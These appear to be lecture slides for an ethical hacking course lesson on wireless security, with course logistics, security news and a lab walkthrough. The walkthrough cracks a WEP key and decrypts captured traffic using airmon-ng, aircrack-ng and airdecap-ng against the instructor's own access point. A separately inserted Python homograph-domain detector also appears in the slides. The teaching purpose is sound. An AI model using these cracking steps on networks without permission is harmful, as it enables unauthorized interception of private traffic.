CIS 76 - Lesson 13: Rich's Lesson Module Checklist

This document provides a checklist for Rich's lesson module. It includes items to check such as slides and labs being posted, workbooks being converted, and ensuring printouts, flashcards, and page numbers are prepared. It also lists checking that the project is published, backups are made to a flash drive, spare batteries are available, and portals are updated. The last updated date of the checklist is also provided.


CIS 76 - Lesson 13

Rich's lesson module checklist

[ ] Slides and lab posted
[ ] WB converted from PowerPoint
[ ] Print out agenda slide and annotate page numbers
[ ] Flash cards
[ ] Properties
[ ] Page numbers
[ ] 1st minute quiz
[ ] Web Calendar summary
[ ] Web book pages
[ ] Commands
[ ] Project published
[ ] Backup slides, whiteboard slides, CCC info, handouts on flash drive
[ ] Spare 9v battery for mic
[ ] Key card for classroom door
[ ] Update CCC Confer and 3C Media portals

Last updated 11/21/2017
CIS 76 Ethical Hacking course map

TCP/IP, Cryptography, Network and Computer Attacks, Footprinting and Social Engineering, Port Scanning, Enumeration, Scripting and Programming, Desktop and Server Vulnerabilities, Embedded Operating Systems, Hacking Web Servers, Hacking Wireless Networks, Evading Network Devices

Student Learner Outcomes

1. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.
Introductions and Credits

Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on sabbatical.
• Rich's site: http://simms-teach.com

And thanks to:

• Steven Bolt for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes, the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!
Student checklist for attending class

1. Browse to: http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today's lesson.
5. Find the Presentation slides for the lesson and download for easier viewing.
6. Click the Enter virtual classroom link to join CCC Confer.
7. Log into Opus-II with Putty or ssh command.

Note: Blackboard Collaborate Launcher only needs to be installed once. It has already been downloaded and installed on the classroom PCs.
Student checklist for suggested screen layout

[ ] Google
[ ] CCC Confer
[ ] Downloaded PDF of Lesson Slides
[ ] CIS 76 website Calendar page
[ ] One or more login sessions to Opus-II
Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.
2) Click overlapping rectangles icon. If white "Start Sharing" text is present then click it as well.
3) Click OK button.
4) Select "Share desktop" and click Share button.
Rich's CCC Confer checklist - setup

[ ] Preload White Board
[ ] Connect session to Teleconference (session now connected to teleconference)
[ ] Is recording on? (red dot means recording)
[ ] Use teleconferencing, not mic (the phone handset icon should change to a little microphone icon and the "Teleconferencing ..." message should be displayed; the mic should be grayed out)
Rich's CCC Confer checklist - screen layout

foxit for slides, chrome, vSphere Client, putty

[ ] layout and share apps

Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus
Rich's CCC Confer checklist - Elmo

The "rotate image" button is necessary if you use both the side table and the white board. Quite interesting that they consider you to be an "expert" in order to use this button!

Elmo rotated down to view side table (rotate image button)
Elmo rotated up to view white board (rotate image button)

Run and share the Image Mate program just as you would any other app with CCC Confer.
Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:

1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

Screenshot captions: Control Panel (small icons); General Tab > Settings...; 500MB cache size; Delete these. Google "Java download" for the runtime.
Start

Sound Check

Students that dial-in should mute their line using *6 to prevent unintended noises distracting the web conference.

Instructor can use *96 to mute all student lines.

Volume
*4 - increase conference volume.
*7 - decrease conference volume.
*5 - increase your voice volume.
*8 - decrease your voice volume.
CIS 76 - Lesson 13

Instructor: Rich Simms


Dial-in: 888-886-3951
Passcode: 136690

Bruce Philip Sam B. Sam R. Miguel Bobby Garrett

May Chris Tanner Helen Xu Mariano Cameron

Tre Aga Ryan M. Karl-Heinz Remy Ryan A.

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
CIS 76 - Lesson 13

First Minute Quiz


Please answer these questions in the order
shown:

For credit email answers to:


[email protected]
within the first few minutes of the live class
15
Hacking Wireless Networks

Objectives
• Explain wireless technology
• Describe wireless networking standards
• Describe wireless authentication
• Use some wireless hacking tools

Agenda
• Quiz #10
• Questions
• In the news
• Best practices
• Final project
• Housekeeping
• Wireless adapters and utilities
• Hacking WEP
• Hacking WPA/WPA2
• Assignment
• Wrap up
CIS 76 - Lesson 13

Admonition

Unauthorized hacking is a crime.

The hacking methods and activities learned in this course can result in prison terms, large fines and lawsuits if used in an unethical manner. They may only be used in a lawful manner on equipment you own or where you have explicit permission from the owner.

Students that engage in any unethical, unauthorized or illegal hacking may be dropped from the course and will receive no legal protection or help from the instructor or the college.
Questions

How this course works?

Past lesson material?

Previous labs?

Chinese proverb: He who asks a question is a fool for five minutes; he who does not ask a question remains a fool forever.
Ryan Placeholder

"However, at the beginning of this next week's class I would gladly share any knowledge/answer any questions people have about web app vulns ...

... finding and exploiting XSS (DOM, Stored, and Reflected), filter/WAF evasion, and injection obfuscation"
In the news

Older news

Fake google.com domain

http://thenextweb.com/google/2016/11/21/google-isnt-google/
http://mashable.com/2016/11/21/fake-google-domain

• Unicode Character 'LATIN LETTER SMALL CAPITAL G' (U+0262)
• ɢoogle.com redirects to xn--oogle-wmc.com which redirects to:
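The redirect above works because the browser converts the non-ASCII label to its xn-- (Punycode, RFC 3492) form before resolving it. The following is an added example, not part of the original slides or either news article: it computes that xn-- form with Python's built-in punycode codec and flags a hostname that visually folds to a watched brand name. The confusables table (only the U+0262 row comes from the page; the Cyrillic rows are added), the brand list and the sample hostnames are constructed for the example.

```python
import unicodedata

# Constructed lookalike table for the example. U+0262 is the character the page
# discusses; the Cyrillic rows are added for illustration and are not from the page.
CONFUSABLES = {
    "\u0262": "g",   # LATIN LETTER SMALL CAPITAL G
    "\u0430": "a",   # CYRILLIC SMALL LETTER A
    "\u0435": "e",   # CYRILLIC SMALL LETTER IE
    "\u043e": "o",   # CYRILLIC SMALL LETTER O
}


def to_ascii(domain):
    """Render a hostname the way a resolver sees it: non-ASCII labels become xn-- A-labels.

    Python's "punycode" codec implements RFC 3492, which is what the xn-- form is built from.
    """
    labels = []
    for label in domain.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def skeleton(domain):
    """Fold confusable code points to their ASCII lookalike after NFKC normalization."""
    normalized = unicodedata.normalize("NFKC", domain.lower())
    return "".join(CONFUSABLES.get(ch, ch) for ch in normalized)


def check_domain(domain, watched_brands):
    """Return (ascii_form, brand) where brand is the watched name the hostname visually
    imitates, or None. A hostname is flagged only if it is not literally the brand."""
    ascii_form = to_ascii(domain)
    folded = skeleton(domain)
    for brand in watched_brands:
        if folded == brand and ascii_form != brand:
            return ascii_form, brand
    return ascii_form, None


if __name__ == "__main__":
    # Constructed sample: the page's lookalike, the genuine domain, a Cyrillic lookalike
    # and an unrelated internationalized name that should not be flagged.
    for host in ["ɢoogle.com", "google.com", "\u0430pple.com", "münchen.example"]:
        ascii_form, brand = check_domain(host, ["google.com", "apple.com"])
        verdict = f"looks like {brand}" if brand else "no match"
        print(f"{host:<18} -> {ascii_form:<24} {verdict}")
```

The xn-- form is the value to put in proxy logs, DNS block lists and alert rules, since that is the string that actually goes over the wire; the skeleton comparison is what catches the lookalike before a user clicks it.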
Recent news

PoisonTap USB stick that installs backdoors on locked PCs and Macs

https://www.wired.com/2016/11/wickedly-clever-usb-stick-installs-backdoor-locked-pcs/?mbid=social_twitter
http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/
http://www.macrumors.com/2016/11/21/usb-device-hijacks-data-from-locked-macs/

• $5 Raspberry Pi computer.
• Can be plugged into a locked or unlocked PC.
• Impersonates an Ethernet connection.
• Waits for a browser request then sends malicious code to the victim's browser cache.
• Created by Samy Kamkar who has released the schematics and code.
CIS 76 - Lesson 13

Older news
https://samy.pl/poisontap/ https://github.com/samyk/poisontap

PoisonTap documentation and code

29
CIS 76 - Lesson 13

Recent news
Security Breach and Spilled Secrets Have Shaken the N.S.A. to Its Core
By SCOTT SHANE, NICOLE PERLROTH and DAVID E. SANGER NOV. 12, 2017

https://www.nytimes.com/2017/11/12/us/nsa-
shadow-brokers.html

"Fifteen months into a wide-ranging investigation by the agency’s counterintelligence arm,


known as Q Group, and the F.B.I., officials still do not know whether the N.S.A. is the victim
of a brilliantly executed hack, with Russia as the most likely perpetrator, an insider’s leak, or
both."

"Compounding the pain for the N.S.A. is the attackers’ regular online public taunts, written in
ersatz broken English. Their posts are a peculiar mash-up of immaturity and sophistication,
laced with profane jokes but also savvy cultural and political references. They suggest that
their author — if not an American — knows the United States well."
30
CIS 76 - Lesson 13

Older news

Your body reveals your password by interfering with Wi-Fi


http://www.theregister.co.uk/2016/11/13/researchers_point_finger_at_handy_smartphone_exploit/

• Analyzing the radio signal can reveal private information using a malicious
Wi-Fi hotspot.
• They claim 81.7% snooping success once the system has enough training
samples.
• Relies on beam-forming technology that does not work with only one
antenna.
• They worked out how user hand movements affect the signal.
• They do not need to compromise the target.
• Published in the ACM as "When CSI meets public WiFi".
CIS 76 - Lesson 13

Recent news

Multi-stage malware sneaks into Google Play


BY LUKAS STEFANKO POSTED 15 NOV 2017
https://www.welivesecurity.com/2017/11/15/m
ulti-stage-malware-sneaks-google-play

"Another set of malicious apps has made it into the official Android app store.
Detected by ESET security systems as Android/TrojanDropper.Agent.BKY, these
apps form a new family of multi-stage Android malware, legitimate-looking and
with delayed onset of malicious activity."
32
CIS 76 - Lesson 13

Recent news

Hackers Poison Google Search Results to Deliver Zeus Panda


BY Kelly Sheridan 11/3/2017
https://www.darkreading.com/vulnerabilities---
threats/hackers-poison-google-search-results-to-
deliver-zeus-panda/d/d-id/1330322

"Most people use Google to search for answers but don't know the results aren't always
safe. Attackers have begun to exploit this reliance on Google by using Search Engine
Optimization (SEO) to populate search results with malicious links and distribute the Zeus
Panda Banking Trojan through a compromised Word document."

"This malware first queries the system's keyboard mapping to determine its language,
and terminates if it detects Russian, Belarusian, Kazak, or Ukrainian. Earlier analysis of
Zeus Panda also revealed it wouldn't run on systems in Russia, Ukraine, Belarus, or
Kazakhstan."

33
Recent news
ProPublica Newsletter
BY Julia Angwin August 2017

http://go.propublica.org/webmail/125411/154792457/ecdf767a701bd0622a1a989e0c25fb1491a030779e2eecdb862fef7b6fb29017

"You write a provocative tweet and an army of Twitter bots heaps abuse on you. You write a Facebook post commenting on a news item and it is reported as hateful and deleted by Facebook."

"After publishing a story about the tech providers that enable hate websites last weekend, my inbox was flooded with notifications that I had been signed up for email newsletters and user accounts on random websites:"
Recent news
Hackers Shut Down ProPublica’s Email For a Day. Here’s How to Stop Attacks Like That.
BY Julia Angwin November 13, 2017

https://www.propublica.org/article/hackers-shut-down-propublicas-email-for-a-day-heres-how-to-stop-attacks-like-that

"In August, my email was attacked. Hate groups overwhelmed my inbox and the inboxes of two of my colleagues, and shut down ProPublica’s email much of the day. (I wrote about this incident in a previous newsletter.)

1. The Messaging Malware Mobile Anti-Abuse Working Group (M3AAWG) has asked bulk email senders to identify subscription confirmation emails with a special technical header.

2. Do you run a website or a newsletter or some sort of listserv? Is CAPTCHA turned on? Turn it on.

3. Do you sign up for newsletters or listservs? Do the newsletters or listservs you sign up for have CAPTCHAs? If not, that could be a problem. Reach out to them and encourage them to implement CAPTCHAs, or the technical header, or both.

4. If you have a WordPress site, you can turn off user registrations — if unneeded. You can also install a CAPTCHA on your sign-up form.
CIS 76 - Lesson 13

Best
Practices
36
Distributed Denial of Service Attacks: Four Best Practices for Prevention and Response

• Locate servers in different data centers.
• Ensure that data centers are located on different networks.
• Ensure that data centers have diverse paths.
• Ensure that the data centers, or the networks that the data centers are connected to, have no notable bottlenecks or single points of failure.

https://insights.sei.cmu.edu/sei_blog/2016/11/distributed-denial-of-service-attacks-four-best-practices-for-prevention-and-response.html
Simple Banking Security Tip: Verbal Passwords

https://krebsonsecurity.com/2017/11/simple-banking-security-tip-verbal-passwords/

"Most financial institutions will let customers add verbal passwords or personal identification numbers (PINs) that are separate from any other PIN or online banking password you might use, although few will advertise this."

"Ultimately, I ended up moving our investments to an institution that consistently adhered to my requirements. Namely, that failing to provide the pass phrase required an in-person visit to a bank branch to continue the transaction, at which time ID would be requested."
CIS 76 - Lesson 13

Final Project

39
CIS 76 - Lesson 13

CIS 76 Project

The final project is available.

Due in two weeks.

Calendar Page

https://simms-
teach.com/cis76calendar.php

https://simms-
teach.com/docs/cis76/cis76final-project.pdf
40
CIS 76 Project

Links to Project document, Test matrix, and online directory for students to share their projects from.

And again ... Due 12/5

https://simms-teach.com/cis76calendar.php
CIS 76 - Lesson 13

CIS 76 Project

Remember late work is not accepted. If you run out of time submit what you have
completed for partial credit.

Excerpt from the Project document 42


CIS 76 - Lesson 13

CIS 76 Project
Use this directory to share your project with other classmates
Calendar Page

https://simms-
teach.com/cis76calendar.php

https://cabrillo.instructure.com/courses/7125/pages/cis-76-project-folder

43
CIS 76 - Lesson 13

CIS 76 Project

Calendar Page Use this spreadsheet to sign up to test a classmate's project

https://simms-
teach.com/cis76calendar.php

https://cabrillo.instructure.com/courses/7125/pages/cis-76-project-testing-
signup-sheet

44
CIS 76 - Lesson 13

CIS 76 Project

Use this template to test


another student's project

45
https://simms-teach.com/docs/cis76/cis76final-project-test-report.pdf
CIS 76 Project

What takes longer?

Creating the hacking project lab?

Or deciding what project to do?
CIS 76 Project

Some Hacking Project Ideas

github projects: https://github.com/Hack-with-Github/Awesome-Hacking

Google searches: hacking tutorials, hacking projects, metasploit tutorials, kali hacking tutorials, ethical hacking tips, ...

CVE Details: find vulnerabilities with Metasploit modules (https://www.cvedetails.com/)

News: articles on security, cybersecurity and hacking

EH-OWASP-XX VM: chock full of project ideas

Pick a project you can build in your CIS 76 EH pod
CIS 76 Project

And don't forget:

Unauthorized hacking is a crime.

The hacking methods and activities learned in this course can result in prison terms, large fines and lawsuits if used in an unethical manner. They may only be used in a lawful manner on equipment you own or where you have explicit permission from the owner.

Students that engage in any unethical, unauthorized or illegal hacking may be dropped from the course and will receive no legal protection or help from the instructor or the college.
CIS 76 - Lesson 13

Housekeeping

49
Housekeeping

1. Lab 10 due 11:59PM tonight.

2. There are eight extra credit labs available now, six points each, due the day of the final exam (Tue).

3. The final project is available now and due in two weeks.
CIS 76 - Lesson 13

Next Week Guest Speakers

1. Denise Moss - Federal Apprenticeship/On-the-


job-training grant and Cabrillo College
participation

2. Jesse Warren - Leveraging Twitter To


Manipulate Social Views

51
CIS 76 - Lesson 13

https://www.youtube.com/watch?v=357GquKbofk

Rich: Looks like fun. I just watched the video and Dan indicated it was only open to County employees.
Would our students have his authorization to participate? They all took the "Hacking without permission is a
crime" oath at the start of class :)

Tess: Oh yes! I checked with Dan before I sent you the email. He is looking forward to all attempts. :)
52
Heads up on Final Exam

Test #3 (final exam) is TUESDAY Dec 12 4-6:50PM

Extra credit labs and final posts due Tue by 11:59PM

• All students will take the test at the same time. The test must be completed by 6:50PM.

• Working and long distance students can take the test online via CCC Confer and Canvas.

• Working students will need to plan ahead to arrange time off from work for the test.

• Test #3 is mandatory (even if you have all the points you want)
Where to find your grades

Send me your survey to get your LOR code name.

The CIS 76 website Grades page: http://simms-teach.com/cis76grades.php

Or check on Opus-II:

checkgrades codename
(where codename is your LOR codename)

Written by Jesse Warren, a past CIS 90 Alumnus

To run checkgrades update your path in .bash_profile with:

PATH=$PATH:/home/cis76/bin

Points that could have been earned:

9 quizzes: 27 points
9 labs: 270 points
2 tests: 60 points
3 forum quarters: 60 points
Total: 417 points

At the end of the term I'll add up all your points and assign you a grade using this table.
CIS 76 - Lesson 13

Wireless
Overview
60
CIS 76 - Lesson 13

The World of Wireless Technology

• Cell phones
• Cordless phones
• Smart phones
• Pagers
• Smart watches
• GPS
• Remote controls
• Garage door openers
• Car door openers
• Two-way radios
• Wireless laptops
• Tablets
• WiFi cams
• Fitbits
• And many more ...
61
Access Points

Stations: devices with wireless network adapters, configured to the SSID of the access point.

Access point: usually connected to a wired network.

The SSID (Service Set Identifier) is used to identify the wireless network and is configured on the access point.

(Diagram: Wired LAN - Access Point - Stations)
CIS 76 - Lesson 13

http://www.l-com.com/content/802.11-Wireless-Standards.pdf 63
CIS 76 - Lesson 13

CEH Website Assessment Question

Which wireless standard has bandwidth up to 54


Mbps and signals in a regulated frequency spectrum
around 5 GHz?

1. 802.11a
2. 802.11b
3. 802.11g
4. 802.11i

https://www.eccouncil.org/programs/certified-ethical-hacker-
ceh/ceh-assessment/

Put your answer in the chat window


64
CIS 76 - Lesson 13

65
Professor Messer

CIS 76 - Lesson 13

Wireless Security using WEP, WPA and WPA2


Professor Messer

https://www.youtube.com/watch?v=DspgyuedICM

Great overview of the three methods of securing wireless 66


CIS 76 - Lesson 13

WIGLE.NET
Access Points on Google Maps

https://wigle.net/ 67
CIS 76 - Lesson 13

WIGLE.NET
Zooming in to see specific SSID's

https://wigle.net/ 68
CIS 76 - Lesson 13

WIGLE.NET
Full screen view of Wi-Fi Encryption Over Time

https://wigle.net/ 69
CIS 76 - Lesson 13

CEH Website Assessment Question

Which of the following WiFi discovery methods refers


to drawing symbols in public places to advertise open
WiFi networks?

1. WarWalking
2. WarFlying
3. WarChalking
4. WarDriving

https://www.eccouncil.org/programs/certified-ethical-hacker-
ceh/ceh-assessment/

Put your answer in the chat window


70
CIS 76 - Lesson 13

71
CIS 76 - Lesson 13

Special
Adapters and
Utilities for Pen
Testing
72
For this lesson I used:

• A MacBook Pro with MacPorts and Aircrack-NG.
  https://www.macports.org/ (enables easy installation of open source software on Macs)
  http://www.aircrack-ng.org/ (WiFi pen-testing tools)

• The EH-Kali-xx VM in the EH Pod (Aircrack-NG already installed).
What Makes a Kali Linux USB Adapter Compatible?

To do wireless penetration testing a card must be able to go into monitor mode and do packet injection; most cards can't do this.

There are known chipsets that will work with Kali and pen testing.

Most popular Kali Linux chipsets:
Atheros AR9271
Ralink RT3070
Ralink RT3572

http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html
CIS 76 - Lesson 13

Hak5 Gear and Tutorials

https://www.hak5.org/shows

https://www.wifipineapple.com/ 75
CIS 76 - Lesson 13

Android WiFi
Analyzer

76
CIS 76 - Lesson 13

Android WiFi Analyzer

Shows frequency spectrum of local WiFi networks


77
CIS 76 - Lesson 13

Android WiFi Analyzer

Shows strength over time of local WiFi networks


78
CIS 76 - Lesson 13

Android WiFi Analyzer

Shows signal strength of a local WiFi network

79
CIS 76 - Lesson 13

Android WiFi Analyzer

Shows local WiFi network channels


80
CIS 76 - Lesson 13

Android WiFi Analyzer

Shows local access points 81


CIS 76 - Lesson 13

Wireless
Notes

82
Monitoring Network Traffic

Wired - use Promiscuous Mode - When a wired adapter is in promiscuous mode it will listen to all packets on the wire. Normally a wired adapter discards any unicast frames destined to a MAC address other than its own.

Wireless - use Monitor Mode - a capability in some wireless adapters to monitor 802.11 radio traffic frames for all networks. This is completely passive because there is no need to associate (connect) to a wireless network.
Wireshark on Kali PC (not VM)

wlan0 is the built-in wireless adapter (Intel Corporation PRO/Wireless 3945ABG [Golan]) on the Kali PC
CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

Wireshark shows traffic on the connected WiFi network destined for the Kali PC
85
Wireshark on Kali PC (not VM)

airmon-ng
airmon-ng start wlan1
airmon-ng

Puts wlan1 (Alfa AWUS051NH) into monitor mode
CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

wlan1 is the USB connected Alfa AWUS051NH adapter on the Kali PC 87


CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

Wireshark shows all 802.11 traffic for all WiFi networks 88


Handy wireless commands

                      Mac           Windows     Kali
Show interfaces       ifconfig      ipconfig    ifconfig, ip addr
Show WiFi             airport -I                iwconfig
Show WiFi networks    airport -s                airodump-ng wlan0
Show WiFi adapters                              airmon-ng
CIS 76 - Lesson 13

Hacking
WEP
90
CIS 76 - Lesson 13

Wired Equivalent Privacy (WEP)

• Defined in the 802.11b standard.


• Encrypts data on a wireless network.
• Uses the insecure RC4 stream cipher.
• WEP can be cracked in minutes.

91
WEP Cracking Theory

Ryan Riley has created an excellent video on how WEP and WEP cracking works.

If you get a chance watch the whole video. We will just look at a portion tonight.

He has lots of other excellent security videos as well.

https://www.youtube.com/watch?v=XoS_GIOLzCo

Start at 02:41... stop at 10:30
WEP Cracking Setup

Access point: Linksys WAP54G
  SSID = Service Set Identifier = name of the network = linkysys
  BSSID = Basic Service Set Identifier = AP MAC address = 00:06:25:4b:21:b4

Attacker: STA (Station) = MacBook Pro
Victim: STA (Station) = Win 10 PC
CIS 76 - Lesson 13

Linksys WAP54G Configuration

For this example we will use WEP (Wired Equivalent Privacy)

94
CIS 76 - Lesson 13

Linksys WAP54G Configuration

Using Mixed Mode (B and G), Channel 5, and Wireless Security (WEP) 95
CIS 76 - Lesson 13

Linksys WAP54G Configuration

Generate a key from a pass phrase and use Key 1 on each station 96
CIS 76 - Lesson 13

Windows 10 PC View

SSID: linkysys
Protocol: 802.11g
Security type: Open
Network band: 2.4 GHz
Network channel: 5
IPv4 address: 192.168.88.112
Manufacturer: Intel Corporation
Description: Intel(R) Centrino(R) Wireless-N 1030
Driver version: 15.11.0.7
Physical address (MAC): 4C-EB-42-85-71-B8

Connected to the linkysys SSID network 97


CIS 76 - Lesson 13

Windows 10 PC View

Watching an Office episode on Netflix so we have some encrypted packets to sniff.


98
CIS 76 - Lesson 13

Monitoring WiFi networks with MacBook Pro


airport -s
Richards-MBP:~ rsimms$ airport -s
SSID BSSID RSSI CHANNEL HT CC SECURITY
(auth/unicast/group)
BenjiNet_5G 2c:56:dc:85:3e:ec -52 149 Y -- WPA2(PSK/AES/AES)
Linksys 90:72:40:0d:50:1e -87 6 Y US WPA2(PSK/AES/AES)
DIRECT-F0-HP ENVY 7640 series a0:8c:fd:72:68:f1 -74 6 Y -- WPA2(PSK/AES/AES)
ATT288 3c:36:e4:22:95:80 -68 1 Y --
WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
uLab-WiFiNet 4c:5e:0c:ca:25:c0 -51 1,+1 Y -- WPA2(PSK/AES/AES)
linkysys 00:06:25:4b:21:b4 -47 5 N -- WEP
BenjiNet 2c:56:dc:85:3e:e8 -47 8 Y -- WPA2(PSK/AES/AES)
Richards-MBP:~ rsimms$

The linkysys SSID on channel 5 is using WEP (not secure).

On a MacBook Pro, the built in airport command with an -s option will scan all available WiFi networks.
CIS 76 - Lesson 13

Capturing Packets using MacBook Pro


airport en0 sniff 5
Richards-MBP:~ rsimms$ airport en0 sniff 5
Capturing 802.11 frames on en0.
^CSession saved to /tmp/airportSniffdZH641.cap.
Richards-MBP:~ rsimms$

Let's start sniffing the channel 5 used by the access point for the SSID linkysys. Use
control-C to stop the capture.

ls -lth /private/tmp/airportSniff*.cap
Richards-MacBook-Pro:~ rsimms$ ls -lth /private/tmp/airportSniff*.cap
-rw-r--r-- 1 rsimms wheel 39M Nov 21 08:41 /private/tmp/airportSniffdZH641.cap
-rw-r--r-- 1 rsimms wheel 69M Nov 21 08:26 /private/tmp/airportSniff8FkDVL.cap
-rw-r--r-- 1 rsimms wheel 108M Nov 20 20:36 /private/tmp/airportSniffk44M58.cap
-rw-r--r-- 1 rsimms wheel 23M Nov 20 19:39 /private/tmp/airportSniffKzpvq8.cap
-rw-r--r-- 1 rsimms wheel 4.4M Nov 20 19:16 /private/tmp/airportSniffFVOuaV.cap
-rw-r--r-- 1 rsimms wheel 497K Nov 20 16:22 /private/tmp/airportSniffh69ghh.cap
-rw-r--r-- 1 rsimms wheel 990K Nov 20 16:14 /private/tmp/airportSniffdLJDh2.cap
-rw-r--r-- 1 rsimms wheel 2.4M Nov 20 16:05 /private/tmp/airportSniffIhmspR.cap
-rw-r--r-- 1 rsimms wheel 1.5M Nov 20 14:28 /private/tmp/airportSniffA8hduu.cap
Richards-MacBook-Pro:~ rsimms$

The packets are captured and dumped into a new file in the /private/tmp
directory with any previous captures. 100
CIS 76 - Lesson 13

WEP Cracking using MacBook Pro


aircrack-ng -b 00:06:25:4b:21:b4 /private/tmp/airportSniffdZH641.cap
Richards-MacBook-Pro:~ rsimms$ aircrack-ng -b 00:06:25:4b:21:b4 /private/tmp/airportSniffdZH641.cap
Opening /private/tmp/airportSniffdZH641.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34953 ivs.

Aircrack-ng 1.2 rc3

[00:00:01] Tested 553015 keys (got 145 IVs)

KB depth byte(vote)
0 32/120 12( 256) B1( 256) B2( 256) B3( 256) 03( 256) B5( 256) 63( 256) 64( 256) B8( 256) 39( 256)
1 26/ 1 C1( 512) 40( 256) 02( 256) 03( 256) 05( 256) 07( 256) 09( 256) 0B( 256) 0E( 256) 0F( 256)
2 5/ 6 AC( 768) 5C( 512) C8( 512) 40( 512) 31( 512) 2F( 512) BE( 512) FD( 512) BD( 512) E1( 512)
3 28/ 3 A6( 512) 23( 256) 6A( 256) 6B( 256) BE( 256) BF( 256) 3C( 256) 6E( 256) 6F( 256) 24( 256)
4 5/ 31 C0( 768) 24( 512) E8( 512) 2A( 512) 1B( 512) BA( 512) A3( 512) A0( 512) F0( 512) 81( 512)

KEY FOUND! [ BE:EF:BE:EF:22 ]


Decrypted correctly: 100%

Richards-MacBook-Pro:~ rsimms$

Callout on the slide: "Not yet ... we will do this in our pod instead."

You could just crack the WEP password on the Mac. Instead we will transfer the packet capture file to the EH-Pod and crack it on the EH-Kali VM.
CIS 76 - Lesson 13

Capture file
transferred
to Kali
102
CIS 76 - Lesson 13

WEP Cracking

scp [email protected]:../depot/lesson13/* .
root@eh-kali-05:~# scp [email protected]:../depot/lesson13/* .
[email protected]'s password:
airportSniffdZH641.cap 100% 39MB 38.5MB/s 00:01
airportSniffENFGOR.cap 100% 6548KB 6.4MB/s 00:00
airportSniffyG7m8J.cap 100% 3023KB 3.0MB/s 00:00
root@eh-kali-05:~#

Copying the packet capture files to the EH-Kali-XX VM

103
CIS 76 - Lesson 13

Capture
dZH641

Crack WEP password


104
CIS 76 - Lesson 13

airportSniffdZH641.cap

This capture was done while watching a portion of an Office episode on Netflix

105
CIS 76 - Lesson 13

WEP Cracking

ls -l airportSniffdZH641.cap
root@eh-kali-05:~# ls -l airportSniffdZH641.cap
-rw-r--r-- 1 root root 40401050 Nov 21 12:31 airportSniffdZH641.cap
root@eh-kali-05:~#

file airportSniffdZH641.cap
root@eh-kali-05:~# file airportSniffdZH641.cap
airportSniffdZH641.cap: tcpdump capture file (little-endian) - version 2.4 (802.11
with radiotap header, capture length 2147483647)
root@eh-kali-05:~#

airportSniffdZH641.cap contains the channel 5 packets


captured on the Macbook Pro.
106
CIS 76 - Lesson 13

WEP Cracking
[EH-Kali-xx] Wireshark

107
We can see one of the beacon frames from the Linksys WAP54G (SSID=linkysys)
WEP Cracking
[EH-Kali-xx] Wireshark

To see only Beacon frames:
1. Select any Beacon frame
2. Expand the IEEE 802.11 Beacon frame layer
3. Right-click on "Type/Subtype: Beacon frame"
4. Select "Apply as filter"
5. Select "Selected"

Creating a filter to show only beacon frames
CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) Run Wireshark and examine the airportSniffdZH641.cap file.

3) Apply a filter to show only beacon frames.

4) What other SSIDs can you discover in this capture?

Write your SSIDs in the chat window


aircrack-ng airportSniffdZH641.cap

Using aircrack-ng to crack the WEP password

Activity

As root, on your EH-Kali-XX VM:

1. If you haven't already:


scp [email protected]:../depot/lesson13/* .

2. aircrack-ng airportSniffdZH641.cap

3. Enter the # number of the "Linkysys" SSID (the one with the "y", not Linksys)

4. "KEY FOUND!" shows the cracked WEP password

What is the WEP password? Write your answer in the chat window

We have the password now, so next we will attempt to extract files from the traffic.

Capture ENFGOR

Exfiltrating Files

airportSniffENFGOR.cap

http://www.bbc.com/news/world-europe-38054216

https://simms-teach.com/docs/cis76/cis76lab01.pdf

Getting files from packet captures

ls -l airportSniffENFGOR.cap
root@eh-kali-05:~# ls -l airportSniffENFGOR.cap
-rw-r--r-- 1 root root 6704919 Nov 21 12:31 airportSniffENFGOR.cap

file airportSniffENFGOR.cap
root@eh-kali-05:~# file airportSniffENFGOR.cap
airportSniffENFGOR.cap: tcpdump capture file (little-endian) - version 2.4 (802.11 with
radiotap header, capture length 2147483647)
root@eh-kali-05:~#

Another file of encrypted WEP packets captured on the MacBook Pro and transferred to the EH-Kali VM

Getting files from packet captures

wireshark airportSniffENFGOR.cap

We can see the 802.11 frames, but all data is encrypted

Getting files from packet captures

airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap


root@eh-kali-05:~# airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap
Total number of packets read 17842
Total number of WEP data packets 7223
Total number of WPA data packets 57
Number of plaintext data packets 1
Number of decrypted WEP packets 7156
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
root@eh-kali-05:~#

Decrypting the packet capture file with the cracked password

ls -l airportSniffENFGOR*
root@eh-kali-05:~# ls -l airportSniffENFGOR*
-rw-r--r-- 1 root root 6704919 Nov 21 12:31 airportSniffENFGOR.cap       (encrypted)
-rw-r--r-- 1 root root 4648498 Nov 21 11:10 airportSniffENFGOR-dec.cap   (decrypted)
root@eh-kali-05:~#

Comparing the encrypted and decrypted packet capture files
